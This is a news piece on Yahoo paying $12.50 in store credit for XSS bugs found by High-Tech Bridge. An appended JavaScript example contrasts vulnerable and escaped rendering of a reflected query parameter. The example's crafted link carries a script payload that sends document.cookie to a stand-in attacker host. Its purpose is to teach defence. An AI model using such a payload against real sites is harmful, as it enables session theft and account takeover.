Yahoo! : Security Research Bug Bounty worth $12.50


Companies such as Facebook, Google and Microsoft take their security seriously enough to run bug bounty programs, and all of them pay more than $100 per bug.

Yahoo is not having a very good run in the reputation department when it comes to user security. Researchers at High-Tech Bridge found a few bugs, and were not exactly impressed with Yahoo's reward.

Swiss penetration testing firm High-Tech Bridge said it ran a “small experiment” with Yahoo to see how quickly the company reacted to vulnerability notifications.

Ilia Kolochenko, High-Tech Bridge CEO, says: “Paying several dollars per vulnerability is a bad joke and won’t motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price. Nevertheless, money is not the only motivation of security researchers.”

“If Yahoo cannot afford to spend money on its corporate security, it should at least try to attract security researchers by other means. Otherwise, none of Yahoo’s customers can ever feel safe.”

The researchers said they found a cross-site scripting (XSS) flaw in a Yahoo web property within 45 minutes. Yahoo’s security team responded within 24 hours, but reportedly did not offer a cash reward, claiming someone else had reported the flaw first.

Unperturbed, the High-Tech Bridge researchers continued and found three more XSS vulnerabilities.

“Each of the discovered vulnerabilities allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it,” the researchers said.

“Yahoo warmly thanked us for reporting the vulnerabilities and offered us… 12.50 USD (twelve dollars and fifty cents) reward per one vulnerability.

“Moreover, this sum was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo’s corporate t-shirts, cups, pens and other accessories.”

High-Tech Bridge noted that Yahoo had since patched all four XSS vulnerabilities.
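The researchers' description above, a crafted link that compromises the account of any logged-in user who clicks it, is the textbook reflected XSS chain: a page reflects a URL parameter into its HTML unescaped, the injected script runs in the victim's origin and exfiltrates the session cookie. The following is an added example, not code from Yahoo or High-Tech Bridge; the endpoint, parameter name, function names and cookie name are hypothetical, and the crafted link is constructed for the demonstration. It shows the vulnerable rendering next to its hardened form and a check that tells the two apart.

```javascript
// Added example: reflected XSS via a crafted link, vulnerable vs. hardened rendering.
// The /search endpoint, the q parameter, the function names and the cookie name
// are hypothetical; none of this is Yahoo's code.

// A constructed "crafted link" of the kind the researchers describe: the attacker
// controls q and hopes the page reflects it into HTML without escaping. The
// payload loads an image from an attacker host with document.cookie in the URL.
const CRAFTED_LINK =
  'https://mail.example.com/search?q=%3Cscript%3Enew%20Image().src%3D' +
  '%27https://attacker.example/c%3F%27%2Bdocument.cookie%3C/script%3E';

// Minimal HTML entity escaping, sufficient for text nodes and quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the decoded query parameter is concatenated straight into markup.
function renderSearchVulnerable(link) {
  const q = new URL(link).searchParams.get('q') || '';
  return `<h1>Results for ${q}</h1>`;
}

// Hardened: the same value is escaped for the HTML context it lands in.
function renderSearchHardened(link) {
  const q = new URL(link).searchParams.get('q') || '';
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Reviewer's check: does the attacker's payload survive as live markup?
// True if a <script> tag or an on*= event handler attribute is present.
function containsLiveScript(html) {
  return /<script\b/i.test(html) || /\son\w+\s*=/i.test(html);
}

// Second line of defence for the "one click = account compromise" chain:
// an HttpOnly session cookie is not readable through document.cookie, so the
// exfiltration step fails even where an XSS bug remains unpatched.
function sessionCookieHeader(value) {
  return `session=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

console.log('vulnerable:', renderSearchVulnerable(CRAFTED_LINK));
console.log('hardened:  ', renderSearchHardened(CRAFTED_LINK));
console.log('payload live (vulnerable):', containsLiveScript(renderSearchVulnerable(CRAFTED_LINK)));
console.log('payload live (hardened):  ', containsLiveScript(renderSearchHardened(CRAFTED_LINK)));
```

Escaping is context-specific: the helper above is correct for HTML text and quoted attribute values, but a value reflected into a JavaScript string, a URL or a CSS property needs that context's encoding instead. The HttpOnly flag limits the damage of cookie theft but does nothing against an injected script that simply issues requests as the victim, so it complements output encoding rather than replacing it.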
